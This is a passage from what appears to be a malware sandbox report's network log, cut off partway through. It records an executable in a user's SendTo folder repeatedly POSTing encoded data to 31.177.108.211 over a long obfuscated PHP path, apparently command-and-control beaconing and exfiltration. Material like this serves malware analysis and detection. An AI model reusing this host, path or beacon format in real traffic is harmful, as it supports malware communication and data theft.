                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:34.102199078 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          65192.168.2.45673431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:34.232089996 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:34.582375050 CEST2532OUTData Raw: 5b 54 46 56 55 41 59 57 59 5f 51 51 52 5a 54 54 5a 5e 5a 59 55 50 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFVUAYWY_QQRZTTZ^ZYUPSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?Y4"" !=5(:)<T?%0 1*,1,#&;9[&!^-/
                                          Sep 13, 2024 21:03:35.003562927 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:35.160618067 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          66192.168.2.45673531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:35.292803049 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:35.644825935 CEST2532OUTData Raw: 5b 52 43 54 55 46 5c 50 59 5f 51 51 52 5c 54 55 5a 5b 5a 5c 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCTUF\PY_QQR\TUZ[Z\UWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(!1& U9*(-<?Z)(T<,*\'U#1 &< 19[&!^-7
                                          Sep 13, 2024 21:03:36.075279951 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:36.205056906 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          67192.168.2.45673731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:37.442460060 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:37.801480055 CEST2532OUTData Raw: 5b 52 43 50 55 42 59 5d 59 5f 51 51 52 5f 54 56 5a 52 5a 59 55 5f 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPUBY]Y_QQR_TVZRZYU_SCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*<5 "6 05);!(<*=;;<)304&)7A1'2;9[&!^-;
                                          Sep 13, 2024 21:03:38.189130068 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:38.347382069 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          68192.168.2.45673831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:38.481354952 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:38.832535982 CEST2532OUTData Raw: 5b 52 46 54 55 45 5c 50 59 5f 51 51 52 5c 54 51 5a 5c 5a 5f 55 54 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RFTUE\PY_QQR\TQZ\Z_UTSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*/) "_73)()+Y)$W<.\0 ,%*'%<<Z19[&!^-7
                                          Sep 13, 2024 21:03:39.255346060 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:39.416332006 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          69192.168.2.45673931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:39.564448118 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:39.910486937 CEST2532OUTData Raw: 5e 55 43 50 50 43 5c 55 59 5f 51 51 52 51 54 51 5a 5c 5a 5a 55 52 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPC\UY_QQRQTQZ\ZZURSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+*] !##:*+5?9++<P+<-'321 X&9[&!^-
                                          Sep 13, 2024 21:03:40.328269958 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:40.464576006 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          70192.168.2.45674031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:40.590359926 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:40.941943884 CEST2528OUTData Raw: 5b 5f 46 55 50 47 59 56 59 5f 51 51 52 59 54 5b 5a 53 5a 5d 55 52 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_FUPGYVY_QQRYT[ZSZ]URSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B(Y-#!Y7=8.(/>(<W<&Z%3<V%:#E&<'29[&!^-
                                          Sep 13, 2024 21:03:41.376859903 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:41.504622936 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          71192.168.2.45674131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:42.440761089 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:42.785664082 CEST2108OUTData Raw: 5b 50 43 52 55 42 5c 56 59 5f 51 51 52 51 54 55 5a 5a 5a 5d 55 56 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCRUB\VY_QQRQTUZZZ]UVSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C?/:]!!9X 3)].S+?*;?<?>]%33%'C&(%9[&!^-
                                          Sep 13, 2024 21:03:43.176472902 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:43.330107927 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 55 3f 08 0e 0f 24 15 30 0d 2c 3d 2a 56 27 06 30 5b 3c 33 25 42 28 03 3c 5c 3a 04 0f 02 33 05 2d 1f 25 2c 05 5d 24 3c 38 0f 2a 00 2e 46 0d 1d 25 1a 2a 2c 20 56 29 00 06 5b 33 2e 21 1a 23 09 23 5d 24 3f 24 0b 34 05 21 04 34 0c 06 0e 31 14 2d 11 2c 0b 04 5a 3e 31 21 01 23 1c 2e 55 0f 15 39 51 25 57 3e 1c 28 0c 27 5f 29 2c 3e 1f 32 01 0a 0e 32 05 06 1a 33 38 32 1d 26 3c 35 5c 32 21 27 5c 3c 3e 36 0a 36 57 31 09 21 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989U?$0,=*V'0[<3%B(<\:3-%,]$<8*.F%*, V)[3.!##]$?$4!41-,Z>1!#.U9Q%W>('_),>22382&<5\2!'\<>66W1!'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          72192.168.2.45674231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:42.444489002 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:42.801253080 CEST2532OUTData Raw: 5b 56 43 55 55 4a 59 5c 59 5f 51 51 52 5d 54 55 5a 5d 5a 59 55 56 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCUUJY\Y_QQR]TUZ]ZYUVSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?)7:#Y(8)?)*(<<.\331<2Y719[&!^-3
                                          Sep 13, 2024 21:03:43.174441099 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:43.327456951 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          73192.168.2.45674331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:43.490695953 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:43.848095894 CEST2532OUTData Raw: 5e 52 43 5f 50 40 5c 51 59 5f 51 51 52 51 54 52 5a 5f 5a 5f 55 53 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RC_P@\QY_QQRQTRZ_Z_USSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(/&Z#"1\7*(+2?!^*+ </6X'#(V%&0&9[&!^-
                                          Sep 13, 2024 21:03:44.278430939 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:44.433160067 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          74192.168.2.45674431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:44.931591034 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:45.287705898 CEST2532OUTData Raw: 5b 51 43 54 50 44 5c 51 59 5f 51 51 52 5c 54 51 5a 52 5a 50 55 53 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCTPD\QY_QQR\TQZRZPUSSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(,&X >73!)(1?%=;??)$/&94%/_2+9[&!^-7
                                          Sep 13, 2024 21:03:45.671010017 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:45.801625967 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          75192.168.2.45674531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:45.944906950 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:46.301347971 CEST2532OUTData Raw: 5b 5e 43 53 50 40 59 56 59 5f 51 51 52 5d 54 55 5a 5b 5a 5b 55 53 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^CSP@YVY_QQR]TUZ[Z[USSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<6\#%7#!>2T+Y6)(<P<<$Q$:$$, Z'+9[&!^-3
                                          Sep 13, 2024 21:03:46.689307928 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:46.842910051 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:46 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          76192.168.2.45674631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:46.982783079 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:47.332437038 CEST2532OUTData Raw: 5b 51 43 56 50 46 59 5c 59 5f 51 51 52 5d 54 50 5a 5a 5a 50 55 56 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
